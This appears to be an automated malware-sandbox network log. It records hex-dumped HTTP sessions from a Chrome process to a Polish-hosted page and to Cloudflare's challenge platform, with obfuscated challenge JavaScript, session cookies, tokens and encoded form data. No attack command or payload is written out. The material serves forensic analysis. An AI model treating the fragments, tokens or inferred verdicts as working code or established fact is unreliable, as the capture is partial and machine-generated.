                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 65 74 75 72 6e 20 68 26 69 7d 2c 27 69 56 45 67 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 57 4b 75 6b 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 43 51 64 42 62 27 3a 67 4d 28 39 38 30 29 2c 27 49 50 4e 78 47 27 3a 67 4d 28 39 30 33 29 2c 27 4c 76 45 43 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 64 44 50 4b 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 41 4f 4b 5a 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 5a 65 55 6a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 56 7a 65
                                                                                      Data Ascii: eturn h&i},'iVEgE':function(h,i){return h==i},'WKuka':function(h,i){return i!==h},'CQdBb':gM(980),'IPNxG':gM(903),'LvECA':function(h,i){return h!=i},'dDPKS':function(h,i){return h&i},'AOKZf':function(h,i){return h*i},'ZeUjc':function(h,i){return h<i},'Vze
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 30 37 29 5d 28 30 29 29 29 7b 69 66 28 64 5b 67 50 28 31 36 37 33 29 5d 28 67 50 28 31 30 38 35 29 2c 64 5b 67 50 28 31 31 32 34 29 5d 29 29 4e 28 67 50 28 31 37 32 31 29 29 3b 65 6c 73 65 7b 66 6f 72 28 78 3d 30 3b 64 5b 67 50 28 31 36 34 30 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 4a 3d 3d 64 5b 67 50 28 34 38 38 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 67 50 28 31 37 36 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 50 28 33 30 37 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 67 50 28 38 36 31 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 67 50 28 34 35 35 29 5d 28 49 2c 31 29 7c 31 2e 37 38 26 4e 2c 64 5b 67 50 28 31 30 38 33 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 67 50 28 31 37 36 34 29 5d 28 64 5b 67
                                                                                      Data Ascii: 07)](0))){if(d[gP(1673)](gP(1085),d[gP(1124)]))N(gP(1721));else{for(x=0;d[gP(1640)](x,G);I<<=1,J==d[gP(488)](j,1)?(J=0,H[gP(1764)](o(I)),I=0):J++,x++);for(N=D[gP(307)](0),x=0;d[gP(861)](8,x);I=d[gP(455)](I,1)|1.78&N,d[gP(1083)](J,j-1)?(J=0,H[gP(1764)](d[g
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 50 28 38 32 39 29 5d 28 67 50 28 31 35 32 33 29 2c 67 50 28 31 35 32 33 29 29 29 7b 69 66 28 53 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 35 39 2e 35 33 5d 5b 33 5d 5e 73 5b 67 50 28 37 31 33 29 5d 28 74 68 69 73 2e 68 5b 73 5b 67 50 28 33 30 39 29 5d 28 35 39 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 67 50 28 33 30 37 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 35 39 2e 31 36 5d 5b 30 5d 2b 2b 29 2c 32 32 29 2b 32 35 36 26 32 35 35 5e 39 31 2c 54 3d 73 5b 67 50 28 31 34 31 31 29 5d 28 47 2c 74 68 69 73 29 2c 55 3d 74 68 69 73 2e 68 5b 73 5b 67 50 28 31 65 33 29 5d 28 35 39 2c 74 68 69 73 2e 67 29 5d 5b 34 5d 2c 31 34 38 21 3d 3d 53 29 7b 69 66 28 53 3d 3d 3d 31 33 34 29 53 3d 74 68 69 73 2e 68 5b 73 5b 67 50 28 31 65 33 29 5d 28 35 39 2c 74 68 69
                                                                                      Data Ascii: P(829)](gP(1523),gP(1523))){if(S=this.h[this.g^59.53][3]^s[gP(713)](this.h[s[gP(309)](59,this.g)][1][gP(307)](this.h[this.g^59.16][0]++),22)+256&255^91,T=s[gP(1411)](G,this),U=this.h[s[gP(1e3)](59,this.g)][4],148!==S){if(S===134)S=this.h[s[gP(1e3)](59,thi
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 64 5b 67 50 28 31 33 39 39 29 5d 28 4a 2c 6a 2d 31 29 29 7b 69 66 28 64 5b 67 50 28 31 36 35 36 29 5d 28 64 5b 67 50 28 31 30 34 34 29 5d 2c 64 5b 67 50 28 31 30 34 34 29 5d 29 29 72 65 74 75 72 6e 20 47 5b 48 5d 5b 67 50 28 31 36 34 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 27 70 27 3b 65 6c 73 65 7b 48 5b 67 50 28 31 37 36 34 29 5d 28 64 5b 67 50 28 31 36 35 33 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 67 50 28 38 39 34 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 55 2c 6a 29 7b 69 66 28 67 55 3d 67 4d 2c 64 5b 67 55 28 31 36 35 36 29 5d 28 67 55 28 39 30 33 29 2c
                                                                                      Data Ascii: J++,N>>=1,x++);for(;;)if(I<<=1,d[gP(1399)](J,j-1)){if(d[gP(1656)](d[gP(1044)],d[gP(1044)]))return G[H][gP(1642)](function(){}),'p';else{H[gP(1764)](d[gP(1653)](o,I));break}}else J++;return H[gP(894)]('')},'j':function(h,gU,j){if(gU=gM,d[gU(1656)](gU(903),
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 46 2c 4b 29 3b 4c 3d 64 5b 67 57 28 37 39 33 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 57 28 37 34 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 67 57 28 38 39 34 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 67 57 28 38 35 39 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 64 5b 67 57 28 35 35 39 29 5d 28 4d 2c 42 29 29 4d 3d 64 5b 67 57 28 32 35 34 29 5d 28 45 2c 45 5b 67 57 28 31 31 34 33 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20
                                                                                      Data Ascii: F,K);L=d[gW(793)](G,H),H>>=1,H==0&&(H=j,G=d[gW(745)](o,I++)),J|=(0<L?1:0)*F,F<<=1);s[B++]=e(J),M=B-1,x--;break;case 2:return D[gW(894)]('')}if(0==x&&(x=Math[gW(859)](2,C),C++),s[M])M=s[M];else if(d[gW(559)](M,B))M=d[gW(254)](E,E[gW(1143)](0));else return
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 5b 28 68 31 28 31 32 31 32 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 32 2c 48 29 7b 66 6f 72 28 68 32 3d 68 31 2c 47 5b 68 32 28 37 37 32 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 32 28 33 33 36 29 5d 28 48 2c 47 5b 68 32 28 37 33 37 29 5d 29 3b 6f 5b 68 32 28 31 33 30 33 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 68 32 28 31 33 34 35 29 5d 28 6f 5b 68 32 28 39 33 37 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 31 28 31 30 30 37 29 5d 5b 68 31 28 34 38 35 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 68 31 28 33 33 36 29 5d 28 43 2c 78 5b 68 31 28 37 33 37 29 5d 29 3b 43 2b 2b 29 69 66 28 44 3d 78 5b 43 5d 2c 45 3d
                                                                                      Data Ascii: [(h1(1212))](x)):function(G,h2,H){for(h2=h1,G[h2(772)](),H=0;o[h2(336)](H,G[h2(737)]);o[h2(1303)](G[H],G[H+1])?G[h2(1345)](o[h2(937)](H,1),1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[h1(1007)][h1(485)](B),C=0;o[h1(336)](C,x[h1(737)]);C++)if(D=x[C],E=
                                                                                      2024-11-15 17:08:54 UTC1369INData Raw: 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 30 28 31 37 36 34 29 5d 28 47 29 7d 7d 2c 65 55 3d 67 4c 28 35 36 37 29 5b 67 4c 28 36 38 36 29 5d 28 27 3b 27 29 2c 65 56 3d 65 55 5b 67 4c 28 31 30 30 37 29 5d 5b 67 4c 28 34 38 35 29 5d 28 65 55 29 2c 65 4d 5b 67 4c 28 31 33 37 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 68 33 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 28 68 33 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 68 33 28 31 30 34 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c 6b 3d 6a 2c 6c 3d 4f 62 6a 65 63 74 5b 68 33 28 37 31 35 29 5d 28 69 29 2c 6d 3d 30 3b 6d 3c 6c 5b 68 33 28 37 33 37 29 5d 3b 6d 2b 2b 29 69 66 28 6e 3d 6c 5b 6d 5d 2c 27 66 27 3d 3d 3d 6e 26 26 28 6e 3d
                                                                                      Data Ascii: j,H)||(j[H]=[]),j[H][h0(1764)](G)}},eU=gL(567)[gL(686)](';'),eV=eU[gL(1007)][gL(485)](eU),eM[gL(1370)]=function(h,i,h3,j,k,l,m,n,o){for(h3=gL,j={},j[h3(1047)]=function(s,v){return s===v},k=j,l=Object[h3(715)](i),m=0;m<l[h3(737)];m++)if(n=l[m],'f'===n&&(n=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.166258191.211.222.2504437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:54 UTC695OUTGET /favicon.ico HTTP/1.1
                                                                                      Host: gambol.smarthost.pl
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://gambol.smarthost.pl/amdhcrviewpmt/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: PHPSESSID=4e927ff4cd1f8500dee1e5063e16de2e; cookie_test=test; js_enabled=true
                                                                                      2024-11-15 17:08:54 UTC164INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 15 Nov 2024 17:08:54 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 315
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      2024-11-15 17:08:54 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.1662584104.18.94.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:56 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:56 UTC379INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 15 Nov 2024 17:08:56 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      cf-chl-out: xyBnte+b2URTw3LzDG2cSjimBCBECDwnWlQ=$ap1CCI1bxO9WW8om
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d89b9c113166-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                      Data Ascii: invalid


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.1662607104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:56 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8e30d87ec8a16c3f/1731690534483/YsSzfqJgTmO8M-E HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:56 UTC200INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:56 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d89cfba6eae9-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 39 08 02 00 00 00 80 be 2d e9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDR9-IDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.1662639104.18.94.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:57 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8e30d87ec8a16c3f/1731690534483/YsSzfqJgTmO8M-E HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:57 UTC200INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:57 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8a2ad4c2ca4-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 39 08 02 00 00 00 80 be 2d e9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDR9-IDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.1662640104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:57 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8e30d87ec8a16c3f/1731690534487/5c0d70b800e056611086d4f5f24c9950452decee7f463be7f314e1558386e50c/qYoTKdafX5udHN4 HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: max-age=0
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:57 UTC143INHTTP/1.1 401 Unauthorized
                                                                                      Date: Fri, 15 Nov 2024 17:08:57 GMT
                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                      Content-Length: 1
                                                                                      Connection: close
                                                                                      2024-11-15 17:08:57 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 58 41 31 77 75 41 44 67 56 6d 45 51 68 74 54 31 38 6b 79 5a 55 45 55 74 37 4f 35 5f 52 6a 76 6e 38 78 54 68 56 59 4f 47 35 51 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gXA1wuADgVmEQhtT18kyZUEUt7O5_Rjvn8xThVYOG5QwAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                      2024-11-15 17:08:57 UTC1INData Raw: 4a
                                                                                      Data Ascii: J


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.1662641104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:58 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 31853
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      CF-Challenge: sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://challenges.cloudflare.com
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:58 UTC16384OUTData Raw: 76 5f 38 65 33 30 64 38 37 65 63 38 61 31 36 63 33 66 3d 59 35 42 49 24 41 6a 61 43 31 43 46 43 6a 6e 6a 55 39 4f 39 7a 4e 52 39 37 39 35 49 69 34 66 52 6a 4f 39 2d 49 52 6e 39 5a 39 71 34 39 6c 39 38 7a 39 66 34 73 31 6a 54 32 6c 39 66 56 52 51 7a 43 33 41 78 39 6a 6c 34 6a 62 39 46 71 6a 70 7a 79 39 63 57 39 55 33 6a 57 39 74 34 79 33 33 31 49 7a 42 6a 63 39 39 43 43 67 71 59 41 53 4d 6f 39 4f 45 46 42 6a 58 46 41 2d 41 55 41 79 49 62 71 6a 53 46 46 6a 66 33 39 58 24 44 4e 67 48 39 41 35 39 4e 24 42 39 76 70 37 50 35 70 79 6f 43 33 39 48 34 53 52 37 6e 25 32 62 2b 79 43 61 5a 6a 39 2b 46 78 32 73 56 4a 24 42 34 39 66 24 42 39 63 75 4f 31 35 49 6e 39 6b 49 6a 48 67 2d 7a 79 48 74 47 2d 45 4c 6c 39 48 79 32 76 35 57 50 67 74 33 67 2d 4a 54 69 64 37 6e 50
                                                                                      Data Ascii: v_8e30d87ec8a16c3f=Y5BI$AjaC1CFCjnjU9O9zNR9795Ii4fRjO9-IRn9Z9q49l98z9f4s1jT2l9fVRQzC3Ax9jl4jb9Fqjpzy9cW9U3jW9t4y331IzBjc99CCgqYASMo9OEFBjXFA-AUAyIbqjSFFjf39X$DNgH9A59N$B9vp7P5pyoC39H4SR7n%2b+yCaZj9+Fx2sVJ$B49f$B9cuO15In9kIjHg-zyHtG-ELl9Hy2v5WPgt3g-JTid7nP
                                                                                      2024-11-15 17:08:58 UTC15469OUTData Raw: 33 63 42 6a 31 31 79 39 39 41 64 44 39 4e 39 62 42 39 43 39 7a 6e 47 34 43 39 7a 39 73 4a 39 5a 34 51 31 6a 54 33 36 52 61 33 73 4c 77 62 68 66 50 73 61 6a 2b 4a 37 39 4e 33 6a 6d 34 4e 6f 58 46 5a 6c 46 39 49 52 38 31 66 33 53 33 41 43 39 4d 39 46 34 39 42 6a 48 39 4c 71 73 71 39 2d 43 62 49 52 52 6a 62 39 73 49 39 41 6a 4b 33 59 6b 56 2b 49 46 39 4c 71 39 6c 39 41 49 78 6e 6a 44 6a 4d 35 66 54 41 6e 6a 32 39 2b 39 6a 51 56 77 39 59 33 39 68 6a 6f 68 6e 34 39 6d 6a 4f 39 53 34 41 68 6b 51 34 7a 39 41 42 6a 31 4c 4e 34 41 6d 6a 56 65 4b 33 6a 45 56 74 49 6e 33 4e 70 6a 4f 62 78 39 42 2b 6a 43 39 66 39 4a 33 6a 50 39 2b 39 39 46 6a 52 39 47 76 6a 49 6a 50 70 46 49 6a 49 39 6e 39 7a 39 4a 6e 6a 61 39 79 4d 73 34 63 56 39 31 33 39 31 33 4e 39 4e 33 63 6e 39
                                                                                      Data Ascii: 3cBj11y99AdD9N9bB9C9znG4C9z9sJ9Z4Q1jT36Ra3sLwbhfPsaj+J79N3jm4NoXFZlF9IR81f3S3AC9M9F49BjH9Lqsq9-CbIRRjb9sI9AjK3YkV+IF9Lq9l9AIxnjDjM5fTAnj29+9jQVw9Y39hjohn49mjO9S4AhkQ4z9ABj1LN4AmjVeK3jEVtIn3NpjObx9B+jC9f9J3jP9+99FjR9GvjIjPpFIjI9n9z9Jnja9yMs4cV913913N9N3cn9
                                                                                      2024-11-15 17:08:59 UTC330INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:59 GMT
                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                      Content-Length: 26312
                                                                                      Connection: close
                                                                                      cf-chl-gen: 2PsPnKmdqikAUWchsJFZQiYm4hZUV7OISfDFAnbambCEjmrC693ijSLHJgAmanI7BbufDUy9ZsP1wsqS$5oiwsvWMJuYffXMc
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8abf9b9286f-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
